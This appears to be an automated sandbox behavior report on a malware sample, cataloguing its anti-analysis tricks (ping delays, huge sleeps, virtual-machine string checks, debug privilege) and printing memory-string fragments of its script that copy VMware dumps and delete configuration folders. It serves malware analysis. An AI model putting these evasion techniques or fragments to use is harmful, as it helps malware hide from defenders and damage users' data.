            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3206
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1070
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3086
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1123
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 626
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 583
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3447
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 629
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3963
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 780
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1615
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3211
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 744
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6440
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1883
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 896
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 938
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 393
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4418
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1618
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 869
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4568
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2284
            Source: C:\Windows\System32\wscript.exe TID: 7628Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\wscript.exe TID: 7620Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\wscript.exe TID: 7568Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7032Thread sleep count: 3206 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7768Thread sleep count: 1070 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8184Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7560Thread sleep count: 3086 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7560Thread sleep count: 1123 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2072Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6424Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8004Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7880Thread sleep count: 3447 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3656Thread sleep time: -4611686018427385s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5980Thread sleep count: 629 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1536Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1080Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7876Thread sleep count: 3963 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8200Thread sleep time: -6456360425798339s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7832Thread sleep count: 780 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7856Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6108Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8392Thread sleep count: 1615 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8408Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8524Thread sleep count: 3211 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8540Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8804Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8872Thread sleep count: 6440 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8876Thread sleep count: 1883 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8900Thread sleep time: -8301034833169293s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8888Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8996Thread sleep count: 896 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9012Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9140Thread sleep count: 938 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9144Thread sleep count: 393 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7740Thread sleep count: 4418 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7740Thread sleep count: 1618 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8244Thread sleep time: -4611686018427385s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9208Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7924Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7388Thread sleep count: 869 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1888Thread sleep count: 4568 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8356Thread sleep time: -5534023222112862s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2172Thread sleep count: 2284 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5748Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5044Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\PING.EXELast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\PING.EXELast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\PING.EXELast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\PING.EXELast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\PING.EXELast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start MenuJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: wscript.exe, 0000002C.00000003.2480448045.000001A7C6A56000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fso.DeleteFolder(datura + "\\Global_Config\\VMware Server\\SSL");
            Source: wscript.exe, 0000002C.00000003.2481157634.000001A7C6810000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \VMware\*.dmp@a
            Source: wscript.exe, 00000019.00000003.2500215161.00000204E74C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fso.DeleteFolder(esporim + "\\Global_Config\\VMware Server\\SSL");
            Source: wscript.exe, 0000000A.00000002.2757757051.00000245917A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2750192999.00000245917A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2747396981.00000245917A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWy
            Source: wscript.exe, 00000019.00000003.2499893796.00000204E7C59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vMCi
            Source: powershell.exe, 00000024.00000002.2530773405.000001EF69F80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWawDe%SystemRoot%\system32\mswsock.dll "FileSystemRights" = [System.Security.AccessControl.FileSystemRights]
            Source: wscript.exe, 0000002C.00000003.2481157634.000001A7C6810000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Global_Config\VMware Server\SSL@cNR
            Source: wscript.exe, 0000002C.00000002.3474677234.000001A7C6855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \VMware\*.dmp
            Source: wscript.exe, 0000002C.00000003.2480448045.000001A7C6A56000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fso.CopyFile(appDirs[i] + "\\VMware\\*.dmp", datura + "\\Dumps\\");
            Source: wscript.exe, 00000019.00000003.2501990211.00000204E7C5C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "vMCi
            Source: powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
            Source: wscript.exe, 00000008.00000002.2758183805.000001C4CE21B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2741039661.000001C4CE21B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2751445693.000001C4CE1D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2741039661.000001C4CE1A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2749879678.000001C4CE21B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2757590871.000001C4CE1D9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2757757051.00000245917A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2747396981.0000024591724000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2751344007.0000024591758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2750192999.00000245917A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2757155199.000002459175E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: wscript.exe, 00000019.00000003.2500215161.00000204E74C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fso.CopyFile(appDirs[i] + "\\VMware\\*.dmp", esporim + "\\Dumps\\");
            Source: wscript.exe, 0000002C.00000003.2828182753.000001A7C49CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2825381568.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000002.3471646885.000001A7C49CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW~
            Source: copyright_infringement_evidence_1.exe, 00000000.00000003.2070984351.00000139D8A3D000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2069859428.00000139D8A3C000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2115104514.00000139D8A3E000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2762559707.00000139D8A42000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2120938127.00000139D8A3E000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2109519395.00000139D8A3E000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2114946387.00000139D8A3E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2526910009.0000020828190000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: wscript.exe, 0000002C.00000002.3474677234.000001A7C6855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: I@\Global_Config\VMware Server\SSLcNR
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
